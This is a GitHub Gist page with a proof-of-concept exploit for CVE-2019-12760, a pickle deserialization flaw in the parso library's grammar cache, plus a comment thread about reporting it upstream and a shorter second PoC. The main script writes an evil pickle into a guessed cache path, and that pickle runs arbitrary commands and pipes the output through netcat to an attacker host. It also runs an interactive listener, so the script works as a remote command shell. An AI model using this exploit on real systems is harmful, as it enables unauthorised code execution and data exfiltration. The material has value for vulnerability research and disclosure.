** DISPUTED ** A deserialization vulnerability exists in the way parso through 0.4.0 handles grammar parsing from the cache. Cache loading relies on pickle and, provided that an evil pickle can be written to a cache grammar file and that its parsing can be triggered, this flaw leads to Arbitrary Code Execution. NOTE: This is disputed because "the cache directory is not under control of the attacker in any common configuration."
Last active
February 16, 2022 08:13
-
-
Save dhondta/f71ae7e5c4234f8edfd2f12503a5dcc7 to your computer and use it in GitHub Desktop.
Proof-of-Concept for Python parso Cache Load Vulnerability (CVE-2019-12760)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
import parso | |
import pickle | |
import random | |
import shutil | |
import threading | |
from hashlib import sha256 | |
from os import makedirs, remove, system | |
from os.path import dirname, exists, join | |
from six import b, u | |
from subprocess import Popen, PIPE | |
from sys import version_info as v | |
from tinyscript import * | |
__author__ = "Alexandre D'Hondt" | |
__version__ = "1.0" | |
__copyright__ = "AGPLv3 (http://www.gnu.org/licenses/agpl.html)" | |
__doc__ = """ | |
This Proof-of-Concept exploit leverages cache loading of the parso library. | |
It requires the attacker to be able to create a folder and to write files on | |
the target. It guesses the path to a cache file, writes an evil pickled object | |
to it and, while triggering grammar loading, makes the vulnerable application | |
load the evil pickle to allow Arbitrary Code Execution. | |
""" | |
# ------------------------- FUNCTIONS TO BE CUSTOMIZED ------------------------- | |
def get_payload(command, lhost, lport): | |
# TODO: implement here the logic to send remote command result to attacker's | |
# host (i.e. if Netcat is not present on the remote server) | |
class PoC(object): | |
def __reduce__(self): | |
return (system, ("{} | nc -n {} {} -w 1" | |
.format(command, lhost, lport), )) | |
return pickle.dumps(PoC()) | |
def remove_from_target(host, port, abspath): | |
# TODO: implement here the logic to remove a file from the remote server | |
remove(abspath) | |
def trigger_grammar_processing(dummy_path, cache_path): | |
# TODO: implement here the logic to trigger grammar processing by parso on | |
# the remote server | |
g = parso.load_grammar() | |
try: | |
g.parse(path=dummy_path, cache=True, cache_path=cache_path) | |
except: | |
pass | |
def write_to_target(host, port, abspath, content=""): | |
# TODO: implement here the logic to write a file to the remote server | |
d = dirname(abspath) | |
if not exists(d): | |
makedirs(d) | |
with open(abspath, 'wb') as f: | |
f.write(b(content)) | |
logger.debug("> File written to '%s'" % abspath) | |
# ----------------------------- STATIC FUNCTIONS ------------------------------- | |
class Listener(object): | |
def __init__(self): | |
self.state = 1 | |
self.thread = threading.Thread(target=self.run) | |
self.kwargs = {'stdout': PIPE, 'stderr': PIPE, 'shell': True} | |
def run(self): | |
global args | |
last_lport = args.lport = 0 | |
while True: | |
if self.state == 0: | |
break | |
while args.lport == last_lport: | |
args.lport = random.randint(12345, 45678) | |
logger.debug("Starting new listener on port {}".format(args.lport)) | |
self.args = ("nc -nlvp {}".format(args.lport), ) | |
out, _ = Popen(*self.args, **self.kwargs).communicate() | |
try: | |
print(out.decode('utf-8')) | |
except: | |
print(u(str(out))) | |
last_lport = args.lport | |
def cache_filepath(cache_path, python_implem, dummy_path, version): | |
# we take the hash from the grammar on the local host, thus assuming it is | |
# the same as target's one given Python's version | |
_ = dirname(parso.__file__) | |
_ = join(_, "python", "grammar%s.txt" % version) | |
h = sha256(open(_).read().encode("utf-8")).hexdigest() | |
p = sha256(dummy_path.encode("utf-8")).hexdigest() | |
_ = "%s/%s-%s-%i/%s-%s.pkl" % (cache_path, python_implem, version, | |
parso.cache._PICKLE_VERSION, h, p) | |
logger.debug("> Cache path: %s" % _) | |
return _ | |
def start_shell(): | |
global args | |
logger.debug("Starting shell...") | |
h, p, l = args.rhost, args.rport, args.lhost | |
i, v, r = args.implem, args.python, args.rdir | |
listener = Listener() | |
listener.thread.start() | |
cnt = 0 | |
while True: | |
d = join(r, "dummy{}".format(cnt)) | |
write_to_target(h, p, d) | |
cpath = cache_filepath(r, i, d, v) | |
try: | |
cmd = raw_input("> ") | |
except: | |
cmd = input("> ") | |
cmd = cmd.strip() | |
if cmd == "": | |
continue | |
elif cmd in ["exit", "quit"]: | |
listener.state = 0 | |
logger.debug("Killing Netcat instances...") | |
Popen("killall -9 nc", shell=True) | |
logger.debug("Joining Netcat thread...") | |
listener.thread.join(1) | |
logger.debug("Removing artifacts...") | |
shutil.rmtree(args.rdir) | |
return | |
write_to_target(h, p, cpath, get_payload(cmd, l, args.lport)) | |
trigger_grammar_processing(d, r) | |
remove_from_target(h, p, cpath) | |
remove_from_target(h, p, d) | |
cnt += 1 | |
# -------------------------- SCRIPT'S EXECUTABLE PART -------------------------- | |
if __name__ == '__main__': | |
global args | |
target = parser.add_argument_group("Target options") | |
target.add_argument("-d", "--cache-dir", dest="rdir", default="/tmp/parso", | |
help="cache absolute folder") | |
target.add_argument("-i", "--implem", default="CPython", | |
choices=["CPython", "IronPython", "Jython", "PyPy"], | |
help="platform Python's implementation") | |
target.add_argument("--rhost", default="127.0.0.1", | |
help="local host address") | |
target.add_argument("--rport", default=80, type=int, | |
help="local host port") | |
target.add_argument("-p", "--python", default="36", | |
help="Python major and minor version digits") | |
payload = parser.add_argument_group("Payload options") | |
payload.add_argument("--lhost", default="127.0.0.1", | |
help="local host address") | |
initialize() | |
start_shell() |
Of course I did, nearly 6 months ago...
Alex writes:
Of course I did, nearly 6 months ago...
Have you received any reply or updates from them?
Yes, I did. The developer told me he would fix it within a few weeks.
NB: I think this would be very unlikely to be exploited in the wild, but yet it should be fixed.
Alex writes:
Yes, I did. The developer told me he would fix it within a few weeks.
NB: I think this would be very unlikely to be exploited in the wild, but yet it should be fixed.
Have you then recontacted him before CVE-2019-12760 was published?
In any case I think it would be better to fill a public issue upstream
now that the problem is public. Can you please fill it?
Thank you!
Have you then recontacted him before CVE-2019-12760 was published?
Not yet, as I'm busy with other matters. I published this as a Gist for the records, also because it's kind of timed out regarding reponsible disclosure and for what it's worth.
In any case I think it would be better to fill a public issue upstream now that the problem is public. Can you please fill it?
You're right, I will open an issue on the related GitHub repo soon.
JFTR this was reported upstream via davidhalter/parso#75.
Thank you!
Simpler proof-of-concept script:
#!/usr/bin/python
import parso
import pickle
import sys
from hashlib import sha256
from os import makedirs, system
from os.path import dirname, exists, join
from six import b
__author__ = "Alexandre D'Hondt"
print("\n1. Writing a dummy empty file...")
dummy = "/tmp/dummy"
with open(dummy, 'wb') as f:
f.write(b(""))
print(" > %s" % dummy)
print("\n2. Computing cache file's path...")
pyversion = "".join(sys.version.split(".")[:2])
grammar = join(dirname(parso.__file__), "python", "grammar%s.txt" % pyversion)
cache = "/tmp/parso/CPython-%s-%i/%s-%s.pkl" % (
pyversion,
parso.cache._PICKLE_VERSION,
sha256(open(grammar).read().encode("utf-8")).hexdigest(),
sha256(dummy.encode("utf-8")).hexdigest()
)
print(" > %s" % cache)
d = dirname(cache)
if not exists(d):
makedirs(d)
print("\n3. Writing a evil cache file (with a pickle payload)...")
class PoC(object):
def __reduce__(self):
return (system, ("ls", ))
with open(cache, 'wb') as f:
f.write(pickle.dumps(PoC()))
print(" > done")
print("\n4. Triggering grammar parsing...")
g = parso.load_grammar()
try:
print("\nCommand's result:\n")
g.parse(path=dummy, cache=True, cache_path="/tmp/parso")
except Exception as e:
pass
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Hello!
Have you shared that with upstream, if not can you please share it?
Thank you!